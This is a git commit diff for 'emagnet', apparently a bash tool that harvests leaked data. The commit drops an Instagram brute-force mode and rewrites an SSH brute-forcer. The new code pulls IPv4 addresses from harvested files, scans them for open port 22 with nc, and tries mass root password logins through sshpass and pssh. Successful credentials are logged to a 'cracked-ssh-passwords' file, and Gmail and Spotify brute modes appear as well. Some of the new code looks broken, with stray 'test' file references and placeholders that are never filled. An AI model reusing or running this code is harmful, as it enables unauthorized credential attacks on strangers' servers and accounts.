removed instagram for re-build and re-added a better, faster and more powerful ssh bruter

diff --git a/emagnet b/emagnet
--- a/emagnet
+++ b/emagnet
@@ -130,14 +130,15 @@ emagnet_mustbefilled() {
   if [[ -z "$VERSION"        ]];then sed -i '91d'  "$CONF";sed -i '91  i VERSION=3.4'                                                                                                             "$CONF";fi
   if [[ -z "$THREADS"        ]];then sed -i '100d' "$CONF";sed -i "100 i THREADS=$(( NUMCPUS + 1 ))"                                                                                              "$CONF";fi
   if [[ -z "$IDLETIME"       ]];then sed -i '109d' "$CONF";sed -i "109 i IDLETIME=3600"                                                                                                           "$CONF";fi
+
   if [[ -z "$GBRUTEFORCE"    ]];then sed -i '125d' "$CONF";sed -i '125 i GBRUTEFORCE=false'                                                                                                       "$CONF";fi
   if [[ -z "$SBRUTEFORCE"    ]];then sed -i '126d' "$CONF";sed -i '126 i SBRUTEFORCE=false'                                                                                                       "$CONF";fi
   if [[ -z "$PBRUTEFORCE"    ]];then sed -i '127d' "$CONF";sed -i '127 i PBRUTEFORCE=false'                                                                                                       "$CONF";fi
-  if [[ -z "$IBRUTEFORCE"    ]];then sed -i '128d' "$CONF";sed -i '128 i IBRUTEFORCE=false'                                                                                                       "$CONF";fi
-  if [[ -z "$ABRUTEFORCE"    ]];then sed -i '129d' "$CONF";sed -i '129 i ABRUTEFORCE=template'                                                                                                       "$CONF";fi
-  if [[ -z "$BBRUTEFORCE"    ]];then sed -i '130d' "$CONF";sed -i '130 i BBRUTEFORCE=template'                                                                                                       "$CONF";fi
-  if [[ -z "$CBRUTEFORCE"    ]];then sed -i '131d' "$CONF";sed -i '131 i CBRUTEFORCE=template'                                                                                                       "$CONF";fi
-  if [[ -z "$DBRUTEFORCE"    ]];then sed -i '132d' "$CONF";sed -i '132 i DBRUTEFORCE=template'                                                                                                       "$CONF";fi
+  if [[ -z "$ABRUTEFORCE"    ]];then sed -i '128d' "$CONF";sed -i '128 i ABRUTEFORCE=tempalate'                                                                                                       "$CONF";fi
+  if [[ -z "$BBRUTEFORCE"    ]];then sed -i '129d' "$CONF";sed -i '129 i BBRUTEFORCE=template'                                                                                                       "$CONF";fi
+  if [[ -z "$CBRUTEFORCE"    ]];then sed -i '130d' "$CONF";sed -i '130 i CBRUTEFORCE=template'                                                                                                       "$CONF";fi
+  if [[ -z "$DBRUTEFORCE"    ]];then sed -i '131d' "$CONF";sed -i '131 i DBRUTEFORCE=template'                                                                                                       "$CONF";fi
+  if [[ -z "$EBRUTEFORCE"    ]];then sed -i '132d' "$CONF";sed -i '132 i EBRUTEFORCE=template'                                                                                                       "$CONF";fi
   if [[ -z "$EMAIL2SEND"     ]];then sed -i '141d' "$CONF";sed -i '141 i EMAIL2SEND='                                                                                                             "$CONF";fi
   if [[ -z "$NOTIFY"         ]];then sed -i '150d' "$CONF";sed -i '150 i NOTIFY=false'                                                                                                            "$CONF";fi
   if [[ -z "$VPN"            ]];then sed -i '162d' "$CONF";sed -i '162 i VPN=false'                                                                                                               "$CONF";fi
@@ -523,10 +524,7 @@ if [[ "$GBRUTEFORCE" = "true" ]]; then
            printf "%18s \e[0;32mSPOTIFY\e[0m BRUTE MODE is: \e[1;32mON\e[0m\e[0m\n\n"
            printf "%64s \n\n" | tr ' ' '='
 	  elif [[ "$SBRUTEFORCE" = "true" ]]; then
-           printf "%18s \e[0;34mSSH\e[0m BRUTE MODE is: \e[1;32mON\e[0m\e[0m\n\n"
-           printf "%64s \n\n" | tr ' ' '='
-	  elif [[ "$IBRUTEFORCE" = "true" ]]; then
-           printf "%18s \e[0;33miNSTAGRAM\e[0m BRUTE MODE is: \e[1;32mON\e[0m\e[0m\n\n"
+           printf "%20s \e[0;34mSSH\e[0m BRUTE MODE is: \e[1;32mON\e[0m\e[0m\n\n"
            printf "%64s \n\n" | tr ' ' '='
 	  else
             sleep 0
@@ -592,10 +590,7 @@ if [[ "$GBRUTEFORCE" = "true" ]]; then
            printf "%18s \e[0;32mSPOTIFY\e[0m BRUTE MODE is: \e[1;32mON\e[0m\e[0m\n\n"
            printf "%64s \n\n" | tr ' ' '='
 	  elif [[ "$SBRUTEFORCE" = "true" ]]; then
-           printf "%18s \e[0;34mSSH\e[0m BRUTE MODE is: \e[1;32mON\e[0m\e[0m\n\n"
-           printf "%64s \n\n" | tr ' ' '='
-	  elif [[ "$IBRUTEFORCE" = "true" ]]; then
-           printf "%18s \e[0;33miNSTAGRAM\e[0m BRUTE MODE is: \e[1;32mON\e[0m\e[0m\n\n"
+           printf "%20s \e[0;34mSSH\e[0m BRUTE MODE is: \e[1;32mON\e[0m\e[0m\n\n"
            printf "%64s \n\n" | tr ' ' '='
 	  else
             sleep 0
@@ -646,8 +641,8 @@ read -p "Do you want to wipe incoming directories (y/n): " cleanup
 }
 
 emagnet_count_down() {
-emagnet_paths
-emagnet_conf
+            emagnet_paths
+            emagnet_conf
 if [[ "$GBRUTEFORCE" = "true" ]]; then
        	    sed -i '125d' "$CONF"
       	    sed -i '125 i GBRUTEFORCE=true' "$CONF"
@@ -655,25 +650,21 @@ if [[ "$GBRUTEFORCE" = "true" ]]; then
       	    sed -i '126 i SBRUTEFORCE=false' "$CONF"
             sed -i '127d' "$CONF"
       	    sed -i '127 i PBRUTEFORCE=false' "$CONF"
-	    sed -i '128d' "$CONF"
-     	    sed -i '128 i IBRUTEFORCE=false' "$CONF"
-             emagnet_conf
-              printf "%19s \e[1;31m$(echo -e "\e[1;34mG\e[1;31mM\e[1;33mA\e[1;34mi\e[0;32mL\e\e[0m") BRUTE MODE is: \e[1;32mON\e[0m\e[0m\n"
-              printf "\n%64s \n\n" | tr ' ' '='
-             emagnet_analyzer
+            emagnet_conf
+            printf "%19s \e[1;31m$(echo -e "\e[1;34mG\e[1;31mM\e[1;33mA\e[1;34mi\e[0;32mL\e\e[0m") BRUTE MODE is: \e[1;32mON\e[0m\e[0m\n"
+            printf "\n%64s \n\n" | tr ' ' '='
+            emagnet_analyzer
 	  elif [[ "$SBRUTEFORCE" = "true" ]]; then
       	    sed -i '125d' "$CONF"
      	    sed -i '125 i GBRUTEFORCE=false' "$CONF"
       	    sed -i '126d' "$CONF"
-	    sed -i '126 i SBRUTEFORCE=true' I"$CONF"
+	    sed -i '126 i SBRUTEFORCE=true' "$CONF"
 	    sed -i '127d' "$CONF"
      	    sed -i '127 i PBRUTEFORCE=false' "$CONF"
-	    sed -i '128d' "$CONF"
-     	    sed -i '128 i IBRUTEFORCE=false' "$CONF"
             emagnet_conf
             printf "%18s \e[0;32mSPOTIFY\e[0m BRUTE MODE is: \e[1;32mON\e[0m\e[0m\n"
             printf "\n%64s \n\n" | tr ' ' '='
-             emagnet_analyzer
+            emagnet_analyzer
 	  elif [[ "$PBRUTEFORCE" = "true" ]]; then
 	    sed -i '125d' "$CONF"
      	    sed -i '125 i GBRUTEFORCE=false' "$CONF"
@@ -681,34 +672,17 @@ if [[ "$GBRUTEFORCE" = "true" ]]; then
      	    sed -i '126 i SBRUTEFORCE=false' "$CONF"
             sed -i '127d' "$CONF"
      	    sed -i '127 i PBRUTEFORCE=true' "$CONF"
-	    sed -i '128d' "$CONF"
-     	    sed -i '128 i IBRUTEFORCE=false' "$CONF"
             emagnet_conf
-            printf "%18s \e[0;34mSSH\e[0m BRUTE MODE is: \e[1;32mON\e[0m\e[0m\n"
-            printf "\n%64s \n\n" | tr ' ' '='
-            emagnet_analyzer
-	  elif [[ "$IBRUTEFORCE" = "true" ]]; then
-	    sed -i '125d' "$CONF"
-     	    sed -i '125 i GBRUTEFORCE=false' "$CONF"
-      	    sed -i '126d' "$CONF"
-     	    sed -i '126 i SBRUTEFORCE=false' "$CONF"
-            sed -i '127d' "$CONF"
-     	    sed -i '127 i PBRUTEFORCE=false' "$CONF"
-            sed -i '121d' "$CONF"
-     	    sed -i '121 i IBRUTEFORCE=true' "$CONF"
-            emagnet_conf
-            printf "%18s \e[0;34mSSH\e[0m BRUTE MODE is: \e[1;32mON\e[0m\e[0m\n"
+            printf "%20s \e[0;34mSSH\e[0m BRUTE MODE is: \e[1;32mON\e[0m\e[0m\n"
             printf "\n%64s \n\n" | tr ' ' '='
             emagnet_analyzer
 	  else
             sed -i '125d' "$CONF"
             sed -i '125 i GBRUTEFORCE=false' "$CONF"
-            sed -i '125d' "$CONF"
-            sed -i '125 i SBRUTEFORCE=false' "$CONF"
+            sed -i '126d' "$CONF"
+            sed -i '126 i SBRUTEFORCE=false' "$CONF"
             sed -i '127d' "$CONF"
             sed -i '127 i PBRUTEFORCE=false' "$CONF"
-	    sed -i '128d' "$CONF"
-     	    sed -i '128 i IBRUTEFORCE=false' "$CONF"
             emagnet_analyzer
 fi
 
@@ -759,7 +733,7 @@ grep -Ewro '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' $EMAGNETHOME/.temp\
 |sort\
 |grep -v $SKIPLIST\
 |awk -F, '!seen[$1]++'> $SSHPORTSCAN
-if [[ $(cat $HOME/.config/emagnet/tmp/.emagnet-portscan|wc -l) -eq "0" ]]; then
+if [[ $(cat $SSHPORTSCAN|wc -l) -eq "0" ]]; then
     printf "%17s[\e[1;31m\e[5m00\e[0m\e[0m] - Ipv4 Addresses found\n"
     sleep 2
 else
@@ -771,26 +745,37 @@ else
       printf "Please use (CTRL+C) to abort the scan at anytime................\n"
       printf "%64s\n" | tr ' ' '='
     sleep 2
-parallel -j$THREADS -a $HOME/.config/emagnet/tmp/.emagnet-portscan '\
-timeout 0.5 nc -n -zv {} 22 > /dev/null 2>&1 |tee $HOME/.config/emagnet/tmp/.emagnet-sshbruter.txt 2>&1 grep open && \
-timeout 1 sshpass -p "$SSHPASS" ssh -v "-o StrictHostKeyChecking=no" $SSHUSER@{} pwd 2>&1 grep "Authenticated to" &> /dev/null
-if [[ $? -eq "0" ]]; then
-    echo -e "[\e[1;32m>>\e[0m] - Found password: root@{}"
-    echo -e "================================================================"     >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
-    echo -e "[+] Login Details For SSH - Cracked $(date +%d/%m/%Y\ -\ %H:%M)"      >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
-    echo -e "[+]------------------------------------------------------------"      >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
-    echo -e "[+] Username: $SSHUSER"                                               >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
-    echo -e "[+] Password: $SSHPASS"                                               >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
-    echo -e "================================================================\n\n" >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
-lse
-    echo -e "[\e[1;31m<<\e[0m] - Wrong password: root@{}"
-    echo -e "[\e[\e[1;31m<<\e[0m] - failed to crack $SSHUSER:$SSHPASS access on: {}:22" >> $EMAGNETLOGS/failed-2-crack.txt
+
+    # Let us portscan all targets and save áll with port 22 open in the text-file
+    cat $HOME/.config/emagnet/tmp/.emagnet-portscan \
+    |xargs -i -P 200 timeout 0.5 nc -zvn {} 22 2>&1 \
+    |grep '\S' \
+    |grep -i "open" \
+    |awk -F'[' '{print $2}'\
+    |cut -d']' -f1 > $HOME/.config/emagnet/tmp/.emagnet-sshbruter.txt
+
+    	 # Now let us attack the targets
+    	 while read sshtargets; do
+     		xargs -P 1200 sshpass -f test pssh -v "-o StrictHostKeyChecking=no" -I -A -p 10 -h test -l root -i "uptime" 2>&1 \
+   		|grep FAILURE
+
+		if [[ $? -eq "0" ]]; then
+		    	echo -e "[\e[1;32m>>\e[0m] - Found password: root@{}"
+    			echo -e "================================================================"     >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
+   		        echo -e "[+] Login Details For SSH - Cracked $(date +%d/%m/%Y\ -\ %H:%M)"      >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
+   			echo -e "[+]------------------------------------------------------------"      >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
+   			echo -e "[+] Username: $SSHUSER"                                               >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
+    			echo -e "[+] Password: $SSHPASS"                                               >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
+    			echo -e "================================================================\n\n" >>    $EMAGNETLOGS/cracked-ssh-passwords.txt
+		  else
+ 			echo -e "[\e[1;31m<<\e[0m] - Wrong password: root@{}"
+   			echo -e "[\e[\e[1;31m<<\e[0m] - failed to crack $SSHUSER:$SSHPASS " >> $EMAGNETLOGS/failed-2-crack.txt
+		fi
+	done < $HOME/.config/emagnet/tmp/.emagnet-sshbruter.txt
+
 fi
-#echo -e "[\e[1;32mopen..\e[0m] - {}:22" || \
-#echo -e "[\e[1;31mclosed\e[0m] - {}:22"' 
-fi
-    rm "$SSHPORTSCAN" "$SSHTARGETS" "grep" "open" &> /dev/null
-    sleep 4
+		    rm "$SSHPORTSCAN" "$SSHTARGETS" "grep" "open" &> /dev/null
+    		  sleep 4
 }
 
 emagnet_spotify_bruter() {
@@ -1235,13 +1220,13 @@ case $1 in
 
 
                  if [[ "$PBRUTEFORCE" = "true" ]]; then
-                                  emagnet_clear
-                                  emagnet_banner
+                                emagnet_clear
+                                emagnet_banner
                                 printf "%18s \e[0;32mSPOTIFY\e[0m BRUTE MODE is: \e[1;32mON\e[0m\e[0m\n"
                                 printf "\n%64s \n\n" | tr ' ' '='
-                                  emagnet_run4ever
+                                emagnet_run4ever
                                 printf "\n%64s \n\n" | tr ' ' '='
-                                  emagnet_spotify_bruter
+                                emagnet_spotify_bruter
                  fi
                                 mv "$EMAGNETTEMP/*" "$EMAGNETHOME/all-files" &> /dev/null
                 else
